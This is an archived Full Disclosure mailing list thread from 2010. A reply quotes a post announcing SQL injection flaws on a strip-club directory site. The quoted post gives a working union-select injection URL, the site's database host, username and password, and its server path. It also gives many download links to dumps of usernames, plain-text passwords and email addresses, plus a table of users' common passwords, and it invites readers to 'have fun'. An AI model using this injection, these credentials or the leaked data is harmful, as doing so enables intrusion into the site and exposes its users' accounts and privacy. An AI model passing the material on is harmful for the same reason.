
Full Disclosure mailing list archives
Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list
From: Jhfjjf Hfdsjj <taser3000 () yahoo com>
Date: Fri, 3 Sep 2010 13:32:29 -0700 (PDT)
Well, one thing I will point out is that the link you submitted for the actual SQL injection doesn't seem to work. Either they fixed it or you messed up the link.

________________________________
From: Ben <iluv2cane () gmail com>
To: full-disclosure () lists grok org uk
Sent: Fri, September 3, 2010 11:09:04 AM
Subject: [Full-disclosure] Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list

I found many SQL injections on Tuscl.net (The ultimate strip club list).
I tried notifying the site, no response.
The server is run on a vmware. So anything that is done to it is restored upon reboot.

This is a dump of usernames, passwords and emails for the site. They are in plain text.
I have removed records that had the system generated password that the user never changed.

http://tinyurl.com/397rzqs
http://bit.ly/bkVnPY
http://is.gd/eTqna
http://jump.fm/FOJRO
http://www.mediafire.com/?l6i1vd25il61a6b
http://www.megafileupload.com/en/file/265174/users-sql-zip.html
http://www.4shared.com/file/w0qqRyDf/userssql.html
http://rapidshare.com/files/416858410/users.sql.zip
http://rapidshare.com/files/416860069/users.sql.zip
http://www.speedyshare.com/files/24097837/users.sql.zip
http://uploading.com/files/e1741mm9/users.sql.zip/
http://bit.ly/cFvd8B
http://is.gd/eTsn5

http://www.tuscl.net/c.php?CID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

Common Passwords and the number of accounts that shared them

Password - cnt
password - 269
123456 - 173
tuscl - 84
stripper - 67
qwerty - 62
12345 - 49
12345678 - 47
1234 - 42
baseball - 36
monkey - 36
princess - 34
stripclub - 33
strip - 32
jennifer - 32
abc123 - 32
mustang - 31
pussy - 29
lapdance - 27
andrew - 27
jmh1978 - 27
letmein - 27
fuckyou - 27
696969 - 27
michelle - 26
harley - 25
dallas - 25
111111 - 25
shadow - 24
corvette - 24
trustno1 - 24
sunshine - 22
dragon - 21
jordan - 21
love - 21
butthead - 20
batman - 20
danielle - 20
buster - 20
password1 - 20
hello - 20
biteme - 20
gaydar - 20
Michael - 19
george - 19
hockey - 19
ginger - 19
6969 - 19
Bandit - 19
lasvegas - 18
taylor - 18
tigger - 18
yankees - 18
chicago - 18
fucker - 18
blahblah - 17
football - 17
1escobar2 - 17
1111 - 17
Jessica - 17
123456789 - 16
testing - 16
phoenix - 16
badboy - 16
gemini - 16
ranger - 16
heather - 15
gateway - 15
secret - 15
welcome - 15
654321 - 15
aaaaaa - 15
tennis - 15
asshole - 15
maggie - 14
pepper - 14
charlie - 14
golfer - 14
strippers - 14
redskins - 14
summer - 14
peanut - 14
chicken - 13
jeremy - 13
hunter - 13
m0ntlure - 13
fuckoff - 13
dancer - 13
bitch - 13
lucky - 13
whatever - 13
killer - 13
prince - 13
robert - 13
orange - 13
thomas - 13
hawaii - 12
redsox - 12
tiger - 12
titties - 12
gators - 12
florida - 12
kitten - 12
austin - 12
merlin - 12
canada - 12
diamond - 12
boston - 12
master - 12
yellow - 12
falcon - 12
jasmine - 12
1234567 - 12
cookie - 12
superman - 12
midnight - 12
blowme - 12
jackass - 12
sparky - 12
peekaboo - 11
doctor - 11
brandy - 11
8675309 - 11
madison - 11
braves - 11
brooklyn - 11
money - 11
anthony - 11
samantha - 11
ashley - 11
lucky1 - 11
amanda - 11
booboo - 11
SOCCER - 11
tarheels - 11
bigdog - 11
pookie - 11
private - 11
tiffany - 11
martin - 11
silver - 11
lakers - 10
eatme - 10
junior - 10
platinum - 10
sex - 10
iloveyou - 10
nicole - 10
vegas - 10
wolfpack - 10
55555555 - 10
barney - 10
melissa - 10
molly - 10
passw0rd - 10
sexy - 10
nascar - 10
dietcoke - 10
chris - 10
boomer - 10
test123 - 10
johnny - 10
red123 - 10
asdfgh - 10
ncc1701 - 10
314159 - 10
internet - 10
jackson - 10
computer - 10
peaches - 10
horny - 10
sierra - 10
rush2112 - 10

Here is the complete list of email addresses registered. The site had no validation so, I am sure, some are fake.

http://www.tuscl.net/emails.zip
http://rapidshare.com/files/416871314/emails.zip
http://www.mediafire.com/?67rzfbvmyr1c492
http://www.speedyshare.com/files/24098846/emails.zip
http://www.megafileupload.com/en/file/265210/emails-zip.html

The path to the working directory is:
/home/httpd/vhosts/tuscl.net/httpdocs/

The SQL information is "localhost" - "tuscl" - "szg4wpl9"

Also if you want to look at all the nudey photos uploaded, here is where they are:
http://www.tuscl.net/pictures/

There are other sites that could have been compromised as well:
vanjonesthinksimanasshole.com
tuscl.com
onerun.com
ecampguide.com (contains another 1200 plain text passwords)
troopedge.com

Well, have fun!

Owner or media, if you want to get ahold of me:
auto595158 () hushmail com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/